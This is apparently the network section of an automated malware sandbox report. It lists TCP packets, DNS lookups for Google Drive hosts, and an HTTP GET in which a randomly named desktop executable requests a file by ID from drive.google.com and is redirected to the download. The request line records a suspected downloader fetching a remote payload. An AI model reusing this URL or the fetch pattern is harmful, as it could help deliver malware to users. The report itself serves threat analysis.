                                                                          Jan 10, 2025 15:34:56.844580889 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:56.844923973 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:56.844945908 CET44349777142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:34:56.845076084 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:56.845098019 CET44349777142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:34:57.209732056 CET44349777142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:34:57.209963083 CET44349777142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:34:57.210057020 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:57.210089922 CET44349777142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:34:57.210122108 CET44349777142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:34:57.210329056 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:57.210330009 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:57.210527897 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:57.210527897 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:34:57.210580111 CET44349777142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:34:57.210762978 CET49777443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:07.221574068 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.221668005 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.221870899 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.222069025 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.222111940 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.481576920 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.481765985 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.482098103 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.482131958 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.482182980 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.482207060 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.753756046 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.754033089 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.754034996 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.754184008 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.754314899 CET49778443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:07.754363060 CET44349778142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:07.784815073 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:07.784895897 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:07.785114050 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:07.785305023 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:07.785356998 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.091720104 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.091921091 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:11.092349052 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:11.092395067 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.092499971 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:11.092547894 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.445502996 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.445703983 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:11.445766926 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.445804119 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.446010113 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:11.446022034 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:11.446213007 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:11.446403980 CET49779443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:11.446461916 CET44349779142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:21.453610897 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.453705072 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:21.453896046 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.454905033 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.454994917 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:21.716140985 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:21.716337919 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.716801882 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.716876030 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:21.716902971 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.716922998 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:21.985662937 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:21.985879898 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:21.985937119 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.986124992 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.986332893 CET49780443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:35:21.986383915 CET44349780142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:35:22.013787985 CET49781443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:22.013861895 CET44349781142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:22.014147043 CET49781443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:22.014369011 CET49781443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:35:22.014415026 CET44349781142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:22.271009922 CET44349781142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:35:22.271224022 CET49781443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:30.499631882 CET49793443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:30.499685049 CET44349793142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:30.850478888 CET44349793142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:30.850619078 CET44349793142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:30.850723028 CET49793443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:30.850773096 CET44349793142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:30.850800991 CET49793443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:30.850874901 CET44349793142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:30.851119995 CET49793443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:30.851272106 CET49793443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:30.851273060 CET49793443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:30.851322889 CET44349793142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:30.851514101 CET49793443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:40.857418060 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:40.857508898 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:40.857728958 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:40.858031988 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:40.858089924 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.118705988 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.118978024 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.121583939 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.121841908 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.123117924 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.123164892 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.124110937 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.124362946 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.124692917 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.166296959 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.396265030 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.396320105 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.396509886 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.396826982 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.396826982 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.396859884 CET44349794142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:41.397157907 CET49794443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:41.431696892 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:41.431785107 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:41.432023048 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:41.432286978 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:41.432300091 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:41.685307026 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:41.685492039 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:41.685816050 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:41.685823917 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:41.685885906 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:41.685890913 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:42.028816938 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:42.028904915 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:42.029021025 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:42.029057026 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:42.029136896 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:42.029295921 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:42.029505014 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:42.029586077 CET44349795142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:42.029759884 CET49795443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.042336941 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.042418003 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.042737961 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.042941093 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.042968035 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.297447920 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.297640085 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.297960997 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.298017979 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.298113108 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.298122883 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.569395065 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.570075989 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.570131063 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.570166111 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.570281029 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.570367098 CET49796443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:36:52.570414066 CET44349796142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:36:52.607880116 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.607961893 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:52.608196974 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.608388901 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.608443022 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:52.869832993 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:52.870284081 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.871551991 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.871598005 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:52.872538090 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:52.872699976 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.873037100 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:52.914289951 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:53.212632895 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:53.212822914 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:53.213016987 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:36:53.213016033 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:53.213205099 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:53.213478088 CET49797443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:36:53.213524103 CET44349797142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:03.227801085 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.227869034 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.228255987 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.228408098 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.228445053 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.482198000 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.482372999 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.482793093 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.482820988 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.482949018 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.482975960 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.756360054 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.756458044 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.756597042 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.756675005 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.756702900 CET49798443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:03.756721973 CET44349798142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:03.775216103 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:03.775247097 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:03.775552988 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:03.775691986 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:03.775703907 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.032509089 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.032675028 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.032985926 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.033031940 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.033166885 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.033211946 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.368096113 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.368294001 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.368333101 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.368396997 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.368500948 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.368513107 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.368545055 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.368659019 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.368659973 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:04.368711948 CET44349799142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:04.368942976 CET49799443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:14.381479979 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.381510019 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.381728888 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.381889105 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.381899118 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.632647991 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.632869959 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.633599997 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.633610964 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.633642912 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.633649111 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.906682968 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.906744957 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.906923056 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.906923056 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.907073975 CET49800443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:14.907089949 CET44349800142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:14.922389984 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:14.922410011 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:14.922597885 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:14.922782898 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:14.922792912 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:15.173244953 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:15.173525095 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:15.173847914 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:15.173858881 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:15.173866987 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:15.173872948 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:15.531192064 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:15.531251907 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:15.531307936 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:15.531385899 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:15.531452894 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:15.531553984 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:15.531877995 CET49801443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:15.531893015 CET44349801142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:25.535070896 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:25.535094976 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:25.535337925 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:25.535465002 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:25.535473108 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:25.786005974 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:25.786298990 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:25.786638975 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:25.786648035 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:25.786778927 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:25.786787033 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:26.062530994 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:26.062616110 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:26.062753916 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:26.062835932 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:26.062928915 CET49802443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:37:26.062946081 CET44349802142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:37:26.082132101 CET49803443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:26.082161903 CET44349803142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:26.082437992 CET49803443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:26.082623005 CET49803443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:26.082633972 CET44349803142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:26.334131956 CET44349803142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:37:26.334300041 CET49803443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:37:26.334590912 CET49803443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:43.815290928 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:43.816214085 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:43.816277027 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.077436924 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.077645063 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.077948093 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.077994108 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.078087091 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.078116894 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.349354982 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.349567890 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.349625111 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.349858046 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.349917889 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.349958897 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.350305080 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.350409031 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.350600004 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.350840092 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.350897074 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.609752893 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.609937906 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.610301971 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.610356092 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.610395908 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.610420942 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.960947990 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961072922 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961158991 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961189032 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961281061 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961549044 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961704016 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961872101 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961997986 CET49817443192.168.11.20142.250.190.97
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:32:07.294373035 CET | 59151 | 53 | 192.168.11.20 | 1.1.1.1
Jan 10, 2025 15:32:07.413742065 CET | 53 | 59151 | 1.1.1.1 | 192.168.11.20
Jan 10, 2025 15:32:07.997942924 CET | 54659 | 53 | 192.168.11.20 | 1.1.1.1
Jan 10, 2025 15:32:08.117649078 CET | 53 | 54659 | 1.1.1.1 | 192.168.11.20

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 15:32:07.294373035 CET | 192.168.11.20 | 1.1.1.1 | 0x2b1b | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:32:07.997942924 CET | 192.168.11.20 | 1.1.1.1 | 0x8168 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 15:32:07.413742065 CET | 1.1.1.1 | 192.168.11.20 | 0x2b1b | No error (0) | drive.google.com | | 142.250.190.110 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:32:08.117649078 CET | 1.1.1.1 | 192.168.11.20 | 0x8168 | No error (0) | drive.usercontent.google.com | | 142.250.190.97 | A (IP address) | IN (0x0001) | false
                                                                          • drive.google.com
                                                                          • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49746 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:32:07 UTC | 216 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
2025-01-10 14:32:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:07 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
